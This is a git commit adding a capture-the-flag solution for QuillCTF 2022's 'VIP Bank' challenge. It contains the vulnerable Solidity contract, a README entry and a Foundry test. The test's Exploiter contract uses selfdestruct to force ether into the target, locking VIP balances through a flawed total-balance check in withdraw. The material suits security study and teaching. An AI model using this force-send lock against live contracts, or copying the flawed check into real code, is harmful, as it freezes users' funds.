Add solution for QuillCTF 2022 - Challenge 3 (minaminao#7)

PraneshASP · minaminao · web-flow · commit 17c5e6acc6ca · 2023-02-07T14:56:50.000+09:00
Co-authored-by: minaminao &lt;minaminaoy@gmail.com&gt;
diff --git a/src/QuillCTF2022/README.md b/src/QuillCTF2022/README.md
@@ -7,6 +7,7 @@ Here's the link to the challenges page: https://quillctf.super.site/challenges.
 **Table of Contents**
 - [QuillHash CTF 2022 Solutions](#quillhash-ctf-2022-solutions)
   - [Road closed:](#road-closed)
+  - [VIP Bank:](#vip-bank)
   - [Confidential Hash:](#confidential-hash)
 
 
@@ -25,6 +26,19 @@ Goerli link: https://goerli.etherscan.io/address/0xd2372eb76c559586be0745914e953
 forge test --match-contract QuillCTF1Solved -vvvv
 ```
 
+
+## VIP Bank:
+https://quillctf.super.site/challenges/quillctf-challenges/vip-bank
+
+**Objective:**
+At any cost, lock the VIP user balance forever into the contract.
+
+Goerli Link: https://goerli.etherscan.io/address/0x28e42e7c4bda7c0381da503240f2e54c70226be2
+
+```
+forge test --match-contract QuillCTF3Solved -vvvv
+```
+
 ## Confidential Hash:
 https://quillctf.super.site/challenges/quillctf-challenges/ctf02
 
@@ -35,4 +49,4 @@ Goerli link: https://goerli.etherscan.io/address/0xf8e9327e38ceb39b1ec3d26f5fad0
  
 ```
 forge test --match-contract QuillCTF2Solved -vvvv
-```
+```
diff --git a/src/QuillCTF2022/VIPBank/QuillCTF3Solved.t.sol b/src/QuillCTF2022/VIPBank/QuillCTF3Solved.t.sol
@@ -0,0 +1,68 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+import "forge-std/Test.sol";
+
+/// ./challenge/VIPBank.sol
+
+/// Define the interface for the Target contract
+interface ITarget {
+    function deposit() external payable;
+
+    function withdraw(uint256 _amount) external;
+
+    function addVIP(address addr) external;
+
+    function contractBalance() external view returns (uint256);
+
+    function balances(address user) external view returns (uint256);
+}
+
+/// Define the Exploiter contract
+contract Exploiter {
+    /// make constructor payable to recieve ether during deployment
+    constructor() payable {}
+
+    /// calls `selfdestruct` to force send ether to the recipient address
+    function exploit(address payable _recipient) external {
+        selfdestruct(_recipient);
+    }
+}
+
+contract QuillCTF3Solved is Test {
+    ITarget target = ITarget(0x28e42E7c4bdA7c0381dA503240f2E54C70226Be2);
+    address manager = 0xE48A248367d3BC49069fA01A26B7517756E32a52;
+    Exploiter exploiter;
+
+    function setUp() public {
+        /// Run the test against the goerli testnet fork
+        vm.createSelectFork(vm.envString("RPC_ANKR_GOERLI"), 8167807);
+
+        /// Deploy the exploiter contract with 2 ether (any amount more than 0.5 will work)
+        exploiter = new Exploiter{value: 2 ether}();
+    }
+
+    function test_exploit() external {
+        /// add this address as VIP
+        vm.prank(manager);
+        target.addVIP(address(this));
+
+        /// deposit some funds
+        target.deposit{value: 0.05 ether}();
+
+        /// make sure that the balances for this address got updated
+        assertEq(target.balances(address(this)), 0.05 ether);
+
+        /// force send ether to the target contract
+        exploiter.exploit(payable(address(target)));
+
+        /// funds got locked!
+        vm.expectRevert(
+            abi.encodePacked(
+                "Cannot withdraw more than 0.5 ETH per transaction"
+            )
+        );
+
+        target.withdraw(0.05 ether);
+    }
+}
diff --git a/src/QuillCTF2022/VIPBank/challenge/VIPBank.sol b/src/QuillCTF2022/VIPBank/challenge/VIPBank.sol
@@ -0,0 +1,51 @@
+// SPDX-License-Identifier: MIT
+
+pragma solidity 0.8.7;
+
+contract VIPBank {
+    address public manager;
+    mapping(address => uint256) public balances;
+    mapping(address => bool) public VIP;
+    uint256 public maxETH = 0.5 ether;
+
+    constructor() {
+        manager = msg.sender;
+    }
+
+    modifier onlyManager() {
+        require(msg.sender == manager, "you are not manager");
+        _;
+    }
+
+    modifier onlyVIP() {
+        require(VIP[msg.sender] == true, "you are not our VIP customer");
+        _;
+    }
+
+    function addVIP(address addr) public onlyManager {
+        VIP[addr] = true;
+    }
+
+    function deposit() public payable onlyVIP {
+        require(
+            msg.value <= 0.05 ether,
+            "Cannot deposit more than 0.05 ETH per transaction"
+        );
+        balances[msg.sender] += msg.value;
+    }
+
+    function withdraw(uint256 _amount) public onlyVIP {
+        require(
+            address(this).balance <= maxETH,
+            "Cannot withdraw more than 0.5 ETH per transaction"
+        );
+        require(balances[msg.sender] >= _amount, "Not enough ether");
+        balances[msg.sender] -= _amount;
+        (bool success, ) = payable(msg.sender).call{value: _amount}("");
+        require(success, "Withdraw Failed!");
+    }
+
+    function contractBalance() public view returns (uint256) {
+        return address(this).balance;
+    }
+}
